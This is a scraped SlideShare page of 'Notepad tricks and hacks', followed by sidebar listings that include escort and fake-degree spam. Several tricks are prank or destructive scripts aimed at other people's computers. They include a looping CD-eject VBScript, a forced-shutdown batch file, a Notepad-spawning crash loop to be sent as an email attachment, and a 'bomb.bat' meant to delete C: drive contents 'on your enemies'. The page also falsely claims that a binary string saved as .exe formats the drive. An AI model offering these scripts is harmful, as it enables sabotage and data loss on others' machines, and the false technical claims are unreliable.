SlideShare a Scribd company logo
1 of 8
Today, I am going to share 10 amazing Notepad Tricks &
Hacks that you can use to get most out of Notepad and
amaze your friends :
1. Create CD Virus from Notepad (continuously
pop out CD Drive)
Open Notepad and Write down below codes:
SET OWMP =
CREATEOBJECT(“WMPLAYER.OCX.7
?)
SET COLCDROMS =
OWMP.CDROMCOLLECTION
DO
IF COLCDROMS.COUNT >= 1 THEN
FOR I = 0 TO COLCDROMS.COUNT –
1
COLCDROMS.ITEM(I).EJECT
NEXT
FOR I = 0 TO COLCDROMS.COUNT –
1
COLCDROMS.ITEM(I).EJECT
NEXT
END IF
WSCRIPT.SLEEP 5000
LOOP
Now save the note as “cdvirus.vbs”. Now, if you open this file in your
system, your cd drive will pop-out continuously. You can try this trick on
your friends computer and give him the fright of his life.
The cdvirus.vbs can be closed only by rebooting your Windows PC.
2. Create Notepad Virus that Shutdown your
Friend Computer with Message
Open Notepad and Type:-
@ECHO OFF
SHUTDOWN.EXE -S -T 10
CLS
MSG * I DON’T LIKE YOU SHIT HEAD!
Now save it as “shutdownvirus.bat”. Every time you
open shutdownvirus.bat on your PC, your PC will shut down with a
message stating ‘I Don’t Like You SHIT head.’ This trick is the best one to
scare your friends.
3. Open 100s of Notepad Tabs And Crash Your
Friends PC/Laptop
@ECHO OFF
:TOP
START
%SYSTEMROOT%SYSTEM32NOTE
PAD.EXE
GOTO TOP
Save this note as “Unlimitednotepad.bat” and send it to your friends as an
attachment. Enjoy them squirming every time their PC crashes.
4. Create Your Own Personal Diary With Time
& Date With Notepad
This Notepad trick will allow you to create Notepad note in such a format
that whenever you edit your note, it will get saved with date and timestamp
automatically. To do this, follow these steps:
3. Open Notepad
4. Type .LOG in the first line.
5. Save the file as Log.txt
6. Now, write something to the file and it will automatically get saved with edited
date and time.
Save the note as “personaldiary.txt”. When you open the file again you will
see the current date and time being inserted automatically after the LOG line.
This will happen automatically every time you
reopen personaldiary.txt and you can keep a diary of sorts with it.
5. Test Your Anti-Virus Software’s Effectiveness
You can also use Notepad to test whether your antivirus is as good as the av
company claims it to be.
Copy the code give below in your Notepad file:
X5O!P%@AP[4PZX54(P^)7CC)7}$EIC
AR-STANDARD-ANTIVIRUS-TEST-
FILE!$H+H*
Save this note as “virus.exe” on your computer and reopen it. If the antivirus
installed on your PC/laptop is good enough it will trigger and flag virus.exe.
If it doesn’t flag the virus.exe automatically put your PC on a scan and check
out whether your antivirus is able to flag it. If not, its time to buy another
anti-virus product.
6. Create Matrix Movie Computer Screen
Effects in Your Computer
Open Notepad and copy the below-mentioned text in your notepad file:
@ECHO OFF
COLOR 02
:START
ECHO %RANDOM% %RANDOM%
%RANDOM% %RANDOM%
%RANDOM% %RANDOM%
%RANDOM% %RANDOM%
%RANDOM% %RANDOM%
GOTO START
Now save the note as”matrix .bat ” in your PC/laptop. Reopen it and enjoy
the Matrix-like effects that appear on your screen.
7. Convert Text Into Audio With This
Notepad Trick
Open Notepad and type
DIM MESSAGE, SAPI
MESSAGE=INPUTBOX(“ENTER
YOUR TEXT FOR CONVERSION–
HACKING-TECHWORM”,”HOVER PC
HACKS TEXT-TO-AUDIO
CONVERTER”) SET
SAPI=CREATEOBJECT(“SAPI.SPVOI
CE”) SAPI.SPEAK MESSAGE
Now save this note as “textaudio.vbs” on your computer.
Open textaudio.vbs and hear your PC/laptop speak.
8. Disco Dancing Keyboard Light Trick
Open Notepad and copy the following text as it is.
SET WSHSHELL
=WSCRIPT.CREATEOBJECT(“WSCRI
PT.SHELL”)
DO
WSCRIPT.SLEEP 100
WSHSHELL.SENDKEYS
“{CAPSLOCK}”
WSHSHELL.SENDKEYS
“{NUMLOCK}”
WSHSHELL.SENDKEYS
“{SCROLLLOCK}”
LOOP
Now save the note as “disco.vbs” on your PC/laptop. Now
reopen disco.vbs and watch your keyboard turn into disco lights.
Never run the below mentioned two
tricks on your PC/laptop. Running these
files will delete/format your C: Drive.
9. Format Your Whole Hard Disk With This
Notepad Trick
This is really interesting things for you guys, you can format any PC by
executing below file. Open notepad and type the below code in it.
0110011001101111011100100110110
1011000010111010000
100000011000110011101001011100
0010000000101111010100010010111
101011000
Now save it as “Format.exe” or give any name you desire but keep the
extension as .exe. That’s It ! Now just double click on the file (to open it) and
your C: drive will be formatted !
10. Write A Simple Undetectable Virus
Like the above trick, this will also delete the contents of your C: Drive. Open
Notepad and copy paste the below text.
@ECHO OFF
DEL C: *.* |Y
And save that as bomb.bat or any other name that you with .bat extension.
When you double-click and open this file, it will start deleting the contents of
your C:
The above two tricks are best to be tried on your enemies.

More Related Content

What's hot

PHP Cookies and Sessions
PHP Cookies and SessionsPHP Cookies and Sessions
PHP Cookies and SessionsNisa Soomro
 
Cookie & Session In ASP.NET
Cookie & Session In ASP.NETCookie & Session In ASP.NET
Cookie & Session In ASP.NETShingalaKrupa
 
Php ssession - cookies -introduction
Php ssession - cookies -introductionPhp ssession - cookies -introduction
Php ssession - cookies -introductionProgrammer Blog
 
Wml step by step
Wml step by stepWml step by step
Wml step by stepRavi Malik
 
PHP Cookies, Sessions and Authentication
PHP Cookies, Sessions and AuthenticationPHP Cookies, Sessions and Authentication
PHP Cookies, Sessions and AuthenticationGerard Sychay
 
ClusterDesktop how-to use on Mac
ClusterDesktop how-to use on MacClusterDesktop how-to use on Mac
ClusterDesktop how-to use on MacEmil Parashkevov
 
Systems Introspection
Systems IntrospectionSystems Introspection
Systems IntrospectionAndrew Howden
 
Google Drive (Desktop Ver) Installation Guide
Google Drive (Desktop Ver) Installation GuideGoogle Drive (Desktop Ver) Installation Guide
Google Drive (Desktop Ver) Installation GuideKhafiah Tan
 
Max Gallo - You don't know MobX State Tree - Codemotion Milan 2018
Max Gallo - You don't know MobX State Tree - Codemotion Milan 2018Max Gallo - You don't know MobX State Tree - Codemotion Milan 2018
Max Gallo - You don't know MobX State Tree - Codemotion Milan 2018Codemotion
 
Development box at Startit Tech Meetup
Development box at Startit Tech MeetupDevelopment box at Startit Tech Meetup
Development box at Startit Tech MeetupStartit
 
Cookies and sessions
Cookies and sessionsCookies and sessions
Cookies and sessionsSukrit Gupta
 
Qtp wsh scripts examples
Qtp wsh scripts examplesQtp wsh scripts examples
Qtp wsh scripts examplesRamu Palanki
 

What's hot (20)

Installation of Openbiblio using Easyphp
Installation of Openbiblio using EasyphpInstallation of Openbiblio using Easyphp
Installation of Openbiblio using Easyphp
 
PHP Cookies and Sessions
PHP Cookies and SessionsPHP Cookies and Sessions
PHP Cookies and Sessions
 
Programming Variables
Programming VariablesProgramming Variables
Programming Variables
 
Sessions and cookies
Sessions and cookiesSessions and cookies
Sessions and cookies
 
Cookie and session
Cookie and sessionCookie and session
Cookie and session
 
Cookie & Session In ASP.NET
Cookie & Session In ASP.NETCookie & Session In ASP.NET
Cookie & Session In ASP.NET
 
Php sessions & cookies
Php sessions & cookiesPhp sessions & cookies
Php sessions & cookies
 
Php ssession - cookies -introduction
Php ssession - cookies -introductionPhp ssession - cookies -introduction
Php ssession - cookies -introduction
 
Wml step by step
Wml step by stepWml step by step
Wml step by step
 
PHP Cookies, Sessions and Authentication
PHP Cookies, Sessions and AuthenticationPHP Cookies, Sessions and Authentication
PHP Cookies, Sessions and Authentication
 
ClusterDesktop how-to use on Mac
ClusterDesktop how-to use on MacClusterDesktop how-to use on Mac
ClusterDesktop how-to use on Mac
 
Booting from VHD
Booting from VHDBooting from VHD
Booting from VHD
 
Systems Introspection
Systems IntrospectionSystems Introspection
Systems Introspection
 
Session and Cookies
Session and CookiesSession and Cookies
Session and Cookies
 
Google Drive (Desktop Ver) Installation Guide
Google Drive (Desktop Ver) Installation GuideGoogle Drive (Desktop Ver) Installation Guide
Google Drive (Desktop Ver) Installation Guide
 
Max Gallo - You don't know MobX State Tree - Codemotion Milan 2018
Max Gallo - You don't know MobX State Tree - Codemotion Milan 2018Max Gallo - You don't know MobX State Tree - Codemotion Milan 2018
Max Gallo - You don't know MobX State Tree - Codemotion Milan 2018
 
Introduction to php web programming - sessions and cookies
Introduction to php   web programming - sessions and cookiesIntroduction to php   web programming - sessions and cookies
Introduction to php web programming - sessions and cookies
 
Development box at Startit Tech Meetup
Development box at Startit Tech MeetupDevelopment box at Startit Tech Meetup
Development box at Startit Tech Meetup
 
Cookies and sessions
Cookies and sessionsCookies and sessions
Cookies and sessions
 
Qtp wsh scripts examples
Qtp wsh scripts examplesQtp wsh scripts examples
Qtp wsh scripts examples
 

Similar to Tricks to hack notepad

Cool notepad tricks for computer 2016
Cool notepad tricks for computer 2016Cool notepad tricks for computer 2016
Cool notepad tricks for computer 2016techmaniya
 
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docxPart 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docxkarlhennesey
 
To speed up your hard disk speed we need to configure a special buffer in the...
To speed up your hard disk speed we need to configure a special buffer in the...To speed up your hard disk speed we need to configure a special buffer in the...
To speed up your hard disk speed we need to configure a special buffer in the...Harshith Agarwal
 
Learn awesome hacking tricks
Learn awesome hacking tricksLearn awesome hacking tricks
Learn awesome hacking tricksSudhanshu Mishra
 
Ewd senchatouch classactivity_part_i
Ewd senchatouch classactivity_part_iEwd senchatouch classactivity_part_i
Ewd senchatouch classactivity_part_ivxVistA.org
 
ntoskrnl-exe-bsod-windows-11.docx
ntoskrnl-exe-bsod-windows-11.docxntoskrnl-exe-bsod-windows-11.docx
ntoskrnl-exe-bsod-windows-11.docxssuser1eca7d
 
OpenWhisk Lab
OpenWhisk Lab OpenWhisk Lab
OpenWhisk Lab Dev_Events
 
Get Starte with MicroPython ESP32
Get Starte with MicroPython ESP32Get Starte with MicroPython ESP32
Get Starte with MicroPython ESP32fanghe22
 
Get Started with MicroPython ESP32
Get Started with MicroPython ESP32Get Started with MicroPython ESP32
Get Started with MicroPython ESP32fanghe22
 
Ankit Phadia Hacking tools (2)
Ankit Phadia Hacking tools (2)Ankit Phadia Hacking tools (2)
Ankit Phadia Hacking tools (2)Chandra Pr. Singh
 
Adding System Call to Kernel
Adding System Call to KernelAdding System Call to Kernel
Adding System Call to KernelMuhammad Bilal
 
Cross-platform Desktop Apps development using HTML, CSS, JS with Electron
Cross-platform Desktop Apps development using HTML, CSS, JS with ElectronCross-platform Desktop Apps development using HTML, CSS, JS with Electron
Cross-platform Desktop Apps development using HTML, CSS, JS with ElectronEsinniobiwa Quareeb
 
maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming Max Kleiner
 
maXbox starter46 work with Wine
maXbox starter46 work with WinemaXbox starter46 work with Wine
maXbox starter46 work with WineMax Kleiner
 
Password Recovery With Ophcrack
Password Recovery With OphcrackPassword Recovery With Ophcrack
Password Recovery With Ophcrackaltairlahad
 

Similar to Tricks to hack notepad (20)

Cool notepad tricks for computer 2016
Cool notepad tricks for computer 2016Cool notepad tricks for computer 2016
Cool notepad tricks for computer 2016
 
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docxPart 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
 
To speed up your hard disk speed we need to configure a special buffer in the...
To speed up your hard disk speed we need to configure a special buffer in the...To speed up your hard disk speed we need to configure a special buffer in the...
To speed up your hard disk speed we need to configure a special buffer in the...
 
Learn awesome hacking tricks
Learn awesome hacking tricksLearn awesome hacking tricks
Learn awesome hacking tricks
 
THE BASIC TOOLS
THE BASIC TOOLSTHE BASIC TOOLS
THE BASIC TOOLS
 
Ewd senchatouch classactivity_part_i
Ewd senchatouch classactivity_part_iEwd senchatouch classactivity_part_i
Ewd senchatouch classactivity_part_i
 
Usb hack
Usb hackUsb hack
Usb hack
 
ntoskrnl-exe-bsod-windows-11.docx
ntoskrnl-exe-bsod-windows-11.docxntoskrnl-exe-bsod-windows-11.docx
ntoskrnl-exe-bsod-windows-11.docx
 
OpenWhisk Lab
OpenWhisk Lab OpenWhisk Lab
OpenWhisk Lab
 
Install
InstallInstall
Install
 
Get Starte with MicroPython ESP32
Get Starte with MicroPython ESP32Get Starte with MicroPython ESP32
Get Starte with MicroPython ESP32
 
Get Started with MicroPython ESP32
Get Started with MicroPython ESP32Get Started with MicroPython ESP32
Get Started with MicroPython ESP32
 
Ankit Phadia Hacking tools (2)
Ankit Phadia Hacking tools (2)Ankit Phadia Hacking tools (2)
Ankit Phadia Hacking tools (2)
 
Adding System Call to Kernel
Adding System Call to KernelAdding System Call to Kernel
Adding System Call to Kernel
 
Win7guide
Win7guideWin7guide
Win7guide
 
Cross-platform Desktop Apps development using HTML, CSS, JS with Electron
Cross-platform Desktop Apps development using HTML, CSS, JS with ElectronCross-platform Desktop Apps development using HTML, CSS, JS with Electron
Cross-platform Desktop Apps development using HTML, CSS, JS with Electron
 
maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming
 
maXbox starter46 work with Wine
maXbox starter46 work with WinemaXbox starter46 work with Wine
maXbox starter46 work with Wine
 
Baabtra.com little coder chapter - 2
Baabtra.com little coder   chapter - 2Baabtra.com little coder   chapter - 2
Baabtra.com little coder chapter - 2
 
Password Recovery With Ophcrack
Password Recovery With OphcrackPassword Recovery With Ophcrack
Password Recovery With Ophcrack
 

Recently uploaded

Kalyan callg Girls, { 07738631006 } || Call Girl In Kalyan Women Seeking Men ...
Kalyan callg Girls, { 07738631006 } || Call Girl In Kalyan Women Seeking Men ...Kalyan callg Girls, { 07738631006 } || Call Girl In Kalyan Women Seeking Men ...
Kalyan callg Girls, { 07738631006 } || Call Girl In Kalyan Women Seeking Men ...Pooja Nehwal
 
Russian Call Girls Kolkata Chhaya 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls Kolkata Chhaya 🤌  8250192130 🚀 Vip Call Girls KolkataRussian Call Girls Kolkata Chhaya 🤌  8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls Kolkata Chhaya 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Develop Keyboard Skill.pptx er power point
Develop Keyboard Skill.pptx er power pointDevelop Keyboard Skill.pptx er power point
Develop Keyboard Skill.pptx er power pointGetawu
 
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...ranjana rawat
 
NO1 Verified Amil Baba In Karachi Kala Jadu In Karachi Amil baba In Karachi A...
NO1 Verified Amil Baba In Karachi Kala Jadu In Karachi Amil baba In Karachi A...NO1 Verified Amil Baba In Karachi Kala Jadu In Karachi Amil baba In Karachi A...
NO1 Verified Amil Baba In Karachi Kala Jadu In Karachi Amil baba In Karachi A...Amil baba
 
Call Girls in Nagpur Bhavna Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Bhavna Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur Bhavna Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Bhavna Call 7001035870 Meet With Nagpur Escortsranjana rawat
 
9892124323, Call Girl in Juhu Call Girls Services (Rate ₹8.5K) 24×7 with Hote...
9892124323, Call Girl in Juhu Call Girls Services (Rate ₹8.5K) 24×7 with Hote...9892124323, Call Girl in Juhu Call Girls Services (Rate ₹8.5K) 24×7 with Hote...
9892124323, Call Girl in Juhu Call Girls Services (Rate ₹8.5K) 24×7 with Hote...Pooja Nehwal
 
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
Top Rated  Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...Top Rated  Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...Call Girls in Nagpur High Profile
 
Top Rated Pune Call Girls Shirwal ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
Top Rated  Pune Call Girls Shirwal ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...Top Rated  Pune Call Girls Shirwal ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
Top Rated Pune Call Girls Shirwal ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...Call Girls in Nagpur High Profile
 
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...Pooja Nehwal
 
VVIP Pune Call Girls Kalyani Nagar (7001035870) Pune Escorts Nearby with Comp...
VVIP Pune Call Girls Kalyani Nagar (7001035870) Pune Escorts Nearby with Comp...VVIP Pune Call Girls Kalyani Nagar (7001035870) Pune Escorts Nearby with Comp...
VVIP Pune Call Girls Kalyani Nagar (7001035870) Pune Escorts Nearby with Comp...Call Girls in Nagpur High Profile
 
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,Pooja Nehwal
 
Lucknow 💋 Call Girls Adil Nagar | ₹,9500 Pay Cash 8923113531 Free Home Delive...
Lucknow 💋 Call Girls Adil Nagar | ₹,9500 Pay Cash 8923113531 Free Home Delive...Lucknow 💋 Call Girls Adil Nagar | ₹,9500 Pay Cash 8923113531 Free Home Delive...
Lucknow 💋 Call Girls Adil Nagar | ₹,9500 Pay Cash 8923113531 Free Home Delive...anilsa9823
 
Book Sex Workers Available Pune Call Girls Yerwada 6297143586 Call Hot India...
Book Sex Workers Available Pune Call Girls Yerwada  6297143586 Call Hot India...Book Sex Workers Available Pune Call Girls Yerwada  6297143586 Call Hot India...
Book Sex Workers Available Pune Call Girls Yerwada 6297143586 Call Hot India...Call Girls in Nagpur High Profile
 
《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...
《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...
《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...ur8mqw8e
 
VVIP Pune Call Girls Balaji Nagar (7001035870) Pune Escorts Nearby with Compl...
VVIP Pune Call Girls Balaji Nagar (7001035870) Pune Escorts Nearby with Compl...VVIP Pune Call Girls Balaji Nagar (7001035870) Pune Escorts Nearby with Compl...
VVIP Pune Call Girls Balaji Nagar (7001035870) Pune Escorts Nearby with Compl...Call Girls in Nagpur High Profile
 
9004554577, Get Adorable Call Girls service. Book call girls & escort service...
9004554577, Get Adorable Call Girls service. Book call girls & escort service...9004554577, Get Adorable Call Girls service. Book call girls & escort service...
9004554577, Get Adorable Call Girls service. Book call girls & escort service...Pooja Nehwal
 
(ZARA) Call Girls Jejuri ( 7001035870 ) HI-Fi Pune Escorts Service
(ZARA) Call Girls Jejuri ( 7001035870 ) HI-Fi Pune Escorts Service(ZARA) Call Girls Jejuri ( 7001035870 ) HI-Fi Pune Escorts Service
(ZARA) Call Girls Jejuri ( 7001035870 ) HI-Fi Pune Escorts Serviceranjana rawat
 
(=Towel) Dubai Call Girls O525547819 Call Girls In Dubai (Fav0r)
(=Towel) Dubai Call Girls O525547819 Call Girls In Dubai (Fav0r)(=Towel) Dubai Call Girls O525547819 Call Girls In Dubai (Fav0r)
(=Towel) Dubai Call Girls O525547819 Call Girls In Dubai (Fav0r)kojalkojal131
 
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...ranjana rawat
 

Recently uploaded (20)

Kalyan callg Girls, { 07738631006 } || Call Girl In Kalyan Women Seeking Men ...
Kalyan callg Girls, { 07738631006 } || Call Girl In Kalyan Women Seeking Men ...Kalyan callg Girls, { 07738631006 } || Call Girl In Kalyan Women Seeking Men ...
Kalyan callg Girls, { 07738631006 } || Call Girl In Kalyan Women Seeking Men ...
 
Russian Call Girls Kolkata Chhaya 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls Kolkata Chhaya 🤌  8250192130 🚀 Vip Call Girls KolkataRussian Call Girls Kolkata Chhaya 🤌  8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls Kolkata Chhaya 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Develop Keyboard Skill.pptx er power point
Develop Keyboard Skill.pptx er power pointDevelop Keyboard Skill.pptx er power point
Develop Keyboard Skill.pptx er power point
 
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
 
NO1 Verified Amil Baba In Karachi Kala Jadu In Karachi Amil baba In Karachi A...
NO1 Verified Amil Baba In Karachi Kala Jadu In Karachi Amil baba In Karachi A...NO1 Verified Amil Baba In Karachi Kala Jadu In Karachi Amil baba In Karachi A...
NO1 Verified Amil Baba In Karachi Kala Jadu In Karachi Amil baba In Karachi A...
 
Call Girls in Nagpur Bhavna Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Bhavna Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur Bhavna Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Bhavna Call 7001035870 Meet With Nagpur Escorts
 
9892124323, Call Girl in Juhu Call Girls Services (Rate ₹8.5K) 24×7 with Hote...
9892124323, Call Girl in Juhu Call Girls Services (Rate ₹8.5K) 24×7 with Hote...9892124323, Call Girl in Juhu Call Girls Services (Rate ₹8.5K) 24×7 with Hote...
9892124323, Call Girl in Juhu Call Girls Services (Rate ₹8.5K) 24×7 with Hote...
 
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
Top Rated  Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...Top Rated  Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
 
Top Rated Pune Call Girls Shirwal ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
Top Rated  Pune Call Girls Shirwal ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...Top Rated  Pune Call Girls Shirwal ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
Top Rated Pune Call Girls Shirwal ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
 
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
 
VVIP Pune Call Girls Kalyani Nagar (7001035870) Pune Escorts Nearby with Comp...
VVIP Pune Call Girls Kalyani Nagar (7001035870) Pune Escorts Nearby with Comp...VVIP Pune Call Girls Kalyani Nagar (7001035870) Pune Escorts Nearby with Comp...
VVIP Pune Call Girls Kalyani Nagar (7001035870) Pune Escorts Nearby with Comp...
 
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
 
Lucknow 💋 Call Girls Adil Nagar | ₹,9500 Pay Cash 8923113531 Free Home Delive...
Lucknow 💋 Call Girls Adil Nagar | ₹,9500 Pay Cash 8923113531 Free Home Delive...Lucknow 💋 Call Girls Adil Nagar | ₹,9500 Pay Cash 8923113531 Free Home Delive...
Lucknow 💋 Call Girls Adil Nagar | ₹,9500 Pay Cash 8923113531 Free Home Delive...
 
Book Sex Workers Available Pune Call Girls Yerwada 6297143586 Call Hot India...
Book Sex Workers Available Pune Call Girls Yerwada  6297143586 Call Hot India...Book Sex Workers Available Pune Call Girls Yerwada  6297143586 Call Hot India...
Book Sex Workers Available Pune Call Girls Yerwada 6297143586 Call Hot India...
 
《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...
《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...
《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...
 
VVIP Pune Call Girls Balaji Nagar (7001035870) Pune Escorts Nearby with Compl...
VVIP Pune Call Girls Balaji Nagar (7001035870) Pune Escorts Nearby with Compl...VVIP Pune Call Girls Balaji Nagar (7001035870) Pune Escorts Nearby with Compl...
VVIP Pune Call Girls Balaji Nagar (7001035870) Pune Escorts Nearby with Compl...
 
9004554577, Get Adorable Call Girls service. Book call girls & escort service...
9004554577, Get Adorable Call Girls service. Book call girls & escort service...9004554577, Get Adorable Call Girls service. Book call girls & escort service...
9004554577, Get Adorable Call Girls service. Book call girls & escort service...
 
(ZARA) Call Girls Jejuri ( 7001035870 ) HI-Fi Pune Escorts Service
(ZARA) Call Girls Jejuri ( 7001035870 ) HI-Fi Pune Escorts Service(ZARA) Call Girls Jejuri ( 7001035870 ) HI-Fi Pune Escorts Service
(ZARA) Call Girls Jejuri ( 7001035870 ) HI-Fi Pune Escorts Service
 
(=Towel) Dubai Call Girls O525547819 Call Girls In Dubai (Fav0r)
(=Towel) Dubai Call Girls O525547819 Call Girls In Dubai (Fav0r)(=Towel) Dubai Call Girls O525547819 Call Girls In Dubai (Fav0r)
(=Towel) Dubai Call Girls O525547819 Call Girls In Dubai (Fav0r)
 
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
 

Tricks to hack notepad

  • 1. Today, I am going to share 10 amazing Notepad Tricks & Hacks that you can use to get most out of Notepad and amaze your friends : 1. Create CD Virus from Notepad (continuously pop out CD Drive) Open Notepad and Write down below codes: SET OWMP = CREATEOBJECT(“WMPLAYER.OCX.7 ?) SET COLCDROMS = OWMP.CDROMCOLLECTION DO IF COLCDROMS.COUNT >= 1 THEN FOR I = 0 TO COLCDROMS.COUNT – 1 COLCDROMS.ITEM(I).EJECT NEXT FOR I = 0 TO COLCDROMS.COUNT – 1 COLCDROMS.ITEM(I).EJECT
  • 2. NEXT END IF WSCRIPT.SLEEP 5000 LOOP Now save the note as “cdvirus.vbs”. Now, if you open this file in your system, your cd drive will pop-out continuously. You can try this trick on your friends computer and give him the fright of his life. The cdvirus.vbs can be closed only by rebooting your Windows PC. 2. Create Notepad Virus that Shutdown your Friend Computer with Message Open Notepad and Type:- @ECHO OFF SHUTDOWN.EXE -S -T 10 CLS MSG * I DON’T LIKE YOU SHIT HEAD! Now save it as “shutdownvirus.bat”. Every time you open shutdownvirus.bat on your PC, your PC will shut down with a message stating ‘I Don’t Like You SHIT head.’ This trick is the best one to scare your friends. 3. Open 100s of Notepad Tabs And Crash Your Friends PC/Laptop
  • 3. @ECHO OFF :TOP START %SYSTEMROOT%SYSTEM32NOTE PAD.EXE GOTO TOP Save this note as “Unlimitednotepad.bat” and send it to your friends as an attachment. Enjoy them squirming every time their PC crashes. 4. Create Your Own Personal Diary With Time & Date With Notepad This Notepad trick will allow you to create Notepad note in such a format that whenever you edit your note, it will get saved with date and timestamp automatically. To do this, follow these steps: 3. Open Notepad 4. Type .LOG in the first line. 5. Save the file as Log.txt 6. Now, write something to the file and it will automatically get saved with edited date and time.
